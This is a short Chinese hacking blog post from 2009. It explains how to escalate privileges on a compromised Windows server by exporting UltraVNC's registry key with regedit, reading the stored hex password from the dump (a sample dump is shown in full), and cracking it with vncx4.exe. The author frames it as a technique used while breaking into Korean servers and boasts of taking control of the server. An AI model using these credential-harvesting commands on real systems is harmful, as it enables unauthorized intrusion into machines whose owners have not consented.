存档

文章标签 ‘破解’

UltraVNC提权—-本地密码破解

2009年10月23日 1 条评论

来  源:http://www.007hack.com/?p=122

作  者:007安全小组—不走的钟

       UltraVNC是开源的远程终端模拟软件,在国外应用非常广泛。不走的钟在渗透韩国服务器时遇到UltraVNC,网络中只有读取VNC注册表的提权方法,但UltraVNC测试不成功,本地安装UltraVNC测试,发现它的本地密码破解与VNC只是注册表中的密码位置发生了变化。

VNC注册表位置:

regedit -e c:\vnc.txt “HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\”

UltraVNC注册表位置:

regedit -e c:\UltraVNC.txt  “HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3″

C:\>type UltraVNC.txt

 Windows Registry Editor Version 5.00
 
 [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
 ”DebugMode”=dword:00000000
 ”DebugLevel”=dword:00000000
 ”AllowLoopback”=dword:00000000
 ”LoopbackOnly”=dword:00000000
 ”DisableTrayIcon”=dword:00000000
 ”MSLogonRequired”=dword:00000000
 ”NewMSLogon”=dword:00000000
 ”UseDSMPlugin”=dword:00000000
 ”ConnectPriority”=dword:00000000
 ”DSMPlugin”=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,39,a0,6e,79,11,a0,6e,79,20,ff,ba,00,00,00,\
   00,00,00,00,00,00,80,83,13,00,d8,ce,6e,79,00,00,00,00,00,00,00,00,00,00,00,\
   00,30,00,13,00,02,00,00,00,00,00,00,00,22,00,00,00,00,00,13,00,00,00,00,00,\
   00,00,00,00,40,b7,e5,77,1b,00,00,00,00,02,00,00,fc,ff,ba,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,80,54,9a,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,80,83,13,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00
 
 [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
 ”FileTransferEnabled”=dword:00000001
 ”FTUserImpersonation”=dword:00000001
 ”BlankMonitorEnabled”=dword:00000001
 ”CaptureAlphaBlending”=dword:00000000
 ”BlackAlphaBlending”=dword:00000000
 ”DefaultScale”=dword:00000001
 ”UseDSMPlugin”=dword:00000000
 ”DSMPlugin”=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,39,a0,6e,79,11,a0,6e,79,20,ff,ba,00,00,00,\
   00,00,00,00,00,00,80,83,13,00,d8,ce,6e,79,00,00,00,00,00,00,00,00,00,00,00,\
   00,30,00,13,00,02,00,00,00,00,00,00,00,22,00,00,00,00,00,13,00,00,00,00,00,\
   00,00,00,00,40,b7,e5,77,1b,00,00,00,00,02,00,00,fc,ff,ba,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,80,54,9a,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,80,83,13,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00
 ”SocketConnect”=dword:00000001
 ”HTTPConnect”=dword:00000000
 ”XDMCPConnect”=dword:00000000
 ”AutoPortSelect”=dword:00000000
 ”InputsEnabled”=dword:00000001
 ”LocalInputsDisabled”=dword:00000000
 ”IdleTimeout”=dword:00000000
 ”QuerySetting”=dword:00000002
 ”QueryTimeout”=dword:0000000a
 ”QueryAccept”=dword:00000000
 ”LockSetting”=dword:00000000
 ”RemoveWallpaper”=dword:00000001
 ”Password”=hex:5f,1f,74,21,f9,e2,15,e9
 ”AllowShutdown”=dword:00000001
 ”AllowProperties”=dword:00000001
 ”AllowEditClients”=dword:00000001
 ”PortNumber”=dword:00001713
 ”HTTPPortNumber”=dword:000016af

使用vncx4.exe即可破解密文,

passwd.psd

最终顺利拿到服务器权限!

Down:vncx4